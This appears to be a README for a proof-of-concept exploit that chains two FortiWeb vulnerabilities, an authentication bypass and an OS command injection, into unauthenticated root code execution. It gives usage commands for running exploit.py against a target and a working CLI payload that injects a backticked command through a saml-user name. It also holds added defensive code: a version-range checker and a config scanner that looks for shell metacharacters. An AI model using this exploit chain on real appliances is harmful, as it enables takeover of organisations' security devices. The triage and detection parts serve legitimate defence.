# FortiWeb Remote Code Execution (RCE) Exploit via CVE-2025-64446 + CVE-2025-58034 Chain
## Description
This script chains two critical vulnerabilities in Fortinet FortiWeb to achieve **unauthenticated remote code execution** with root privileges:
1. **CVE-2025-64446** – Authentication Bypass via Relative Path Traversal
   Allows an unauthenticated attacker to bypass authentication and create a new administrative account.
2. **CVE-2025-58034** – Authenticated OS Command Injection
   An authenticated attacker (using the account created in step 1) can execute arbitrary OS commands as root via crafted HTTP requests.
By combining these two vulnerabilities, an attacker can go from zero access to full system compromise without any prior credentials.
**Final Impact:** Unauthenticated Remote Code Execution (root shell equivalent)
## Vulnerability Details
### CVE-2025-64446 – Authentication Bypass (Relative Path Traversal)
* **Type:** Relative Path Traversal leading to Authentication Bypass
* **Severity:** Critical (CVSS 3.1 Base Score: 9.8)
* **CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
* **Affected Versions:**
  * FortiWeb 8.0.0 – 8.0.1
  * FortiWeb 7.6.0 – 7.6.4
  * FortiWeb 7.4.0 – 7.4.9
  * FortiWeb 7.2.0 – 7.2.11
  * FortiWeb 7.0.0 – 7.0.11
### CVE-2025-58034 – Authenticated OS Command Injection
* **CVE:** CVE-2025-58034
* **Type:** Improper Neutralization of Special Elements used in an OS Command (OS Command Injection) – [CWE-78]
* **Severity:** Critical
* **Description:**
  An authenticated attacker can execute arbitrary operating system commands on the underlying system via specially crafted HTTP requests or CLI commands.
* **Affected Versions (wider range than CVE-2025-64446):**
  * FortiWeb 8.0.0 – 8.0.1
  * FortiWeb 7.6.0 – 7.6.5 *(note: includes 7.6.5)*
  * FortiWeb 7.4.0 – 7.4.10 *(note: includes 7.4.10)*
  * FortiWeb 7.2.0 – 7.2.11
  * FortiWeb 7.0.0 – 7.0.11
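To triage an appliance against the two ranges above, here is an added example (not part of the PoC repository) that parses a FortiWeb version string and reports which of the two CVEs it falls under; it also reports whether the full unauthenticated chain applies, which requires both CVEs on the same build. The `",build…"` suffix handling is an assumption about how the version appears in status output.

```python
# Added example: classify a FortiWeb version against the affected ranges
# listed on this page. Ranges are inclusive (lowest, highest) per branch.
from typing import List, Tuple

Version = Tuple[int, int, int]

AFFECTED = {
    "CVE-2025-64446": [((8, 0, 0), (8, 0, 1)), ((7, 6, 0), (7, 6, 4)),
                       ((7, 4, 0), (7, 4, 9)), ((7, 2, 0), (7, 2, 11)),
                       ((7, 0, 0), (7, 0, 11))],
    "CVE-2025-58034": [((8, 0, 0), (8, 0, 1)), ((7, 6, 0), (7, 6, 5)),
                       ((7, 4, 0), (7, 4, 10)), ((7, 2, 0), (7, 2, 11)),
                       ((7, 0, 0), (7, 0, 11))],
}


def parse_version(text: str) -> Version:
    """Parse '7.6.4', 'v7.6.4' or '7.6.4,build1234' (assumed format) into a tuple."""
    core = text.strip().lstrip("vV").split(",")[0]
    parts = core.split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised FortiWeb version: {text!r}")
    return int(parts[0]), int(parts[1]), int(parts[2])


def affected_cves(text: str) -> List[str]:
    """Return the CVE ids from this page whose affected ranges contain the version."""
    v = parse_version(text)
    return [cve for cve, ranges in AFFECTED.items()
            if any(lo <= v <= hi for lo, hi in ranges)]


def chain_exploitable(text: str) -> bool:
    """The unauthenticated chain needs both CVEs; a build affected only by
    CVE-2025-58034 (e.g. 7.6.5) still exposes RCE to anyone holding admin
    credentials, so it is not 'safe', just not reachable without a login."""
    hits = affected_cves(text)
    return "CVE-2025-64446" in hits and "CVE-2025-58034" in hits


if __name__ == "__main__":
    for sample in ("7.4.9", "7.6.5", "7.6.6", "v8.0.1,build0107"):
        print(sample, affected_cves(sample), chain_exploitable(sample))
```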
**Combined Attack Chain:**
1. Use CVE-2025-64446 → Create admin account (unauthenticated)
2. Log in with newly created admin account
3. Use CVE-2025-58034 → Execute arbitrary OS commands as root
## Usage
1. **Clone the repository:**
```bash
git clone https://github.com/lincemorado97/CVE-2025-64446_CVE-2025-58034
cd CVE-2025-64446_CVE-2025-58034
```
2. **Install dependencies:**
```bash
pip install -r requirements.txt
```
3. **Run the full exploit (creates admin + executes command):**
```bash
python exploit.py <target_ip> [-u <username>] [-p <password>]
```
* `<target_ip>`: The IP address or hostname of the vulnerable FortiWeb appliance. This is a *required* argument.
* `-u <username>` (optional): Specify a custom username for the created administrative account. If not provided, a UUID will be used.
* `-p <password>` (optional): Specify a custom password for the created administrative account. If not provided, the username will be used as the password.
**Example:**
```bash
python exploit.py 192.168.1.100 -u admin123 -p password456
```
This will attempt to create an administrative account with the username "admin123" and password "password456" on the target appliance at 192.168.1.100.
If no username and password are specified:
```bash
python exploit.py 192.168.1.100
```
The script will generate a random UUID for the username and use it as the password.
## Demonstration
### Step 1: Authentication Bypass & Admin Creation (CVE-2025-64446)


### Step 2: Remote Code Execution as root (CVE-2025-58034)
After successfully logging in with the newly created administrative account, an attacker can exploit the authenticated command injection vulnerability through specifically crafted requests or directly via the FortiWeb CLI.
One reliable exploitation method is to use the following CLI command (executed from the FortiWeb command-line interface after authentication):
```text
config user saml-user
edit "`<YOUR COMMAND>`"
set entityID http://foo
set service-path /foo
set enforce-signing disable
set slo-bind post
set slo-path /foo
set sso-bind post
set sso-path /foo
end
```
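For defenders, an added example (not from the repository) that hunts a FortiWeb configuration export for the footprint this chain leaves behind: `user saml-user` objects whose names contain shell metacharacters (the pattern shown in the CLI block above) and UUID-shaped administrator names (the PoC's default when `-u` is omitted). The `config system admin` block layout and the sample export are assumptions constructed for the example.

```python
# Added example: scan a Fortinet-style config export for artefacts of the
# CVE-2025-64446 + CVE-2025-58034 chain. The sample below is constructed.
import re
from typing import List, Tuple

SAMPLE_CONFIG = """\
config system admin
    edit "admin"
        set accprofile "prof_admin"
    next
    edit "3f2b1c4e-9a7d-4c1b-8e2f-0a1b2c3d4e5f"
        set accprofile "prof_admin"
    next
end
config user saml-user
    edit "`id`"
        set entityID http://foo
        set service-path /foo
    next
end
"""

UUID_RE = re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)
SHELL_META = ("`", "$(", ";", "|", "&")


def parse_entries(config: str) -> List[Tuple[str, str]]:
    """Return (section, object name) pairs; a stack copes with nested config blocks."""
    stack: List[str] = []
    entries: List[Tuple[str, str]] = []
    for raw in config.splitlines():
        line = raw.strip()
        if line.startswith("config "):
            stack.append(line[len("config "):].strip())
        elif line == "end" and stack:
            stack.pop()
        elif line.startswith("edit ") and stack:
            entries.append((stack[-1], line[len("edit "):].strip().strip('"')))
    return entries


def find_indicators(config: str) -> List[str]:
    """Flag objects matching the PoC footprint described on this page."""
    findings: List[str] = []
    for section, name in parse_entries(config):
        if section == "user saml-user" and any(m in name for m in SHELL_META):
            findings.append(f"saml-user {name!r}: shell metacharacters in object name")
        elif section == "system admin" and UUID_RE.match(name):
            findings.append(f"admin {name!r}: UUID-shaped administrator name")
    return findings


if __name__ == "__main__":
    for finding in find_indicators(SAMPLE_CONFIG):
        print(finding)
```

A clean export returns an empty list; any hit should be reconciled against change records, since a legitimate admin would not normally carry a UUID name or backticks in a SAML user object.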


## Verification
After execution:
- Check output for command results (e.g., `uid=0(root) gid=0(root)` confirms root RCE)
- Log in via SSH (if you added a key) or web interface with created credentials
## References
* CVE-2025-64446 – https://nvd.nist.gov/vuln/detail/CVE-2025-64446
* CVE-2025-58034 – https://nvd.nist.gov/vuln/detail/CVE-2025-58034
* Fortinet PSIRT Advisories: https://www.fortinet.com/support/psirt
* Analysis: https://attackerkb.com/topics/zClpINmLCh/cve-2025-58034/rapid7-analysis
**Disclaimer:** This tool is provided for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have explicit permission to test is illegal.